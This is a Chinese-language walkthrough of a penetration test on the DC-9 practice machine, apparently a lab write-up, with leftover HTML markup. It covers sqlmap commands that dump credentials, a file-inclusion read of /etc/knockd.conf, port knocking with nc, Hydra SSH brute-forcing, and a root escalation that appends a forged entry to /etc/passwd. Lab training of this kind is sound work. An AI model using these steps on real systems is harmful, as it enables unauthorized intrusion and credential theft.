DC-9 靶机渗透测试详细解析<\/h1>

一、环境搭建<\/h2>

攻击机<\/strong>：Kali Linux (IP: 192.168.200.14)<\/li>

靶机<\/strong>：DC-9 (IP待发现)<\/li> <\/ul>
二、信息收集<\/h2>
1. 发现靶机IP<\/h3>
使用ARP扫描发现同网段存活主机：<\/p>
arp-scan -l <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 发现开放端口：<\/p> 80端口 (HTTP服务)<\/li> 22端口 (SSH服务，初始未开放)<\/li> <\/ul> 3. Web应用枚举<\/h3> 访问80端口Web服务：<\/p> 主页面包含用户信息展示<\/li> 存在搜索功能，可能存在XSS或SQL注入漏洞<\/li> 登录页面需要正确凭证<\/li> <\/ul> 三、漏洞探测与利用<\/h2> 1. SQL注入漏洞<\/h3> 使用SQLMap进行自动化注入：<\/p> 方法一：使用请求文件<\/h4> 将捕获的请求保存为1.txt<\/li> 获取数据库：<\/li> <\/ol> python sqlmap.py -r 1.txt --dbs --batch <\/span><\/span><\/code><\/pre> 获取Staff数据库的表：<\/li> <\/ol> python sqlmap.py -r 1.txt -D Staff --tables <\/span><\/span><\/code><\/pre> 获取Users表的字段：<\/li> <\/ol> python sqlmap.py -r 1.txt -D Staff -T Users --columns <\/span><\/span><\/code><\/pre> 导出数据：<\/li> <\/ol> python sqlmap.py -r 1.txt -D Staff -T Users --dump <\/span><\/span><\/code><\/pre>方法二：直接注入<\/h4> python sqlmap.py -u "http:\/\/192.168.200.6\/results.php"<\/span> --data "search=1"<\/span> --dbs <\/span><\/span><\/code><\/pre>获取的凭证<\/h4> admin:transorbital1 (MD5: 856f5de590ef37314e7c3bdf6f8a66dc)<\/li> <\/ul> 2. 文件包含漏洞<\/h3> 在manage.php页面发现文件包含漏洞：<\/p> 可以读取系统文件如\/etc\/knockd.conf<\/li> <\/ul> 3. 端口敲门机制<\/h3> 通过查看\/etc\/knockd.conf发现端口敲门序列：<\/p> nc 192.168.200.6 7469<\/span> <\/span><\/span>nc 192.168.200.6 8475<\/span> <\/span><\/span>nc 192.168.200.6 9842<\/span> <\/span><\/span><\/code><\/pre>敲门后22端口开放。<\/p> 四、SSH爆破<\/h2> 使用Hydra爆破SSH：<\/p> hydra -L username.txt -P password.txt ssh:\/\/192.168.200.6 <\/span><\/span><\/code><\/pre>获取的有效凭证：<\/p> chandlerb:UrAG0D!<\/li> joeyt:Passw0rd<\/li> janitor:Ilovepeepee<\/li> <\/ul> 五、权限提升<\/h2> 1. 信息收集<\/h3> 在janitor家目录发现额外密码：<\/p> cd .secrets-for-putin\/ <\/span><\/span>cat passwords-found-on-post-it-notes.txt <\/span><\/span><\/code><\/pre>获取更多密码：<\/p> BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts <\/code><\/pre> 2. 发现特权用户<\/h3> 使用新密码发现fredf用户：<\/p> fredf:B4-Tru3-001<\/li> <\/ul> 检查sudo权限：<\/p> sudo -l <\/span><\/span><\/code><\/pre>发现fredf可以执行\/opt\/devstuff\/dist\/test\/test<\/p> 3. 利用test程序提权<\/h3> test程序功能：将文件A内容附加到文件B<\/p> 提权步骤：<\/p> 生成加密密码：<\/li> <\/ol> openssl passwd -1 -salt dc 123456<\/span> <\/span><\/span><\/code><\/pre> 创建伪造的passwd条目：<\/li> <\/ol> echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:\/bin\/bash'<\/span> >> \/tmp\/dc <\/span><\/span><\/code><\/pre> 追加到\/etc\/passwd：<\/li> <\/ol> sudo .\/test \/tmp\/dc \/etc\/passwd <\/span><\/span><\/code><\/pre> 使用新创建的用户切换root：<\/li> <\/ol> su dc <\/span><\/span>密码：123456 <\/span><\/span><\/code><\/pre>六、总结<\/h2> 渗透路径：<\/p> 发现SQL注入 → 获取管理员凭证<\/li> 发现文件包含 → 获取端口敲门序列<\/li> 端口敲门 → 开启SSH<\/li> SSH爆破 → 获取多个用户凭证<\/li> 信息收集 → 发现更多密码<\/li> 特权程序滥用 → 提权至root<\/li> <\/ol>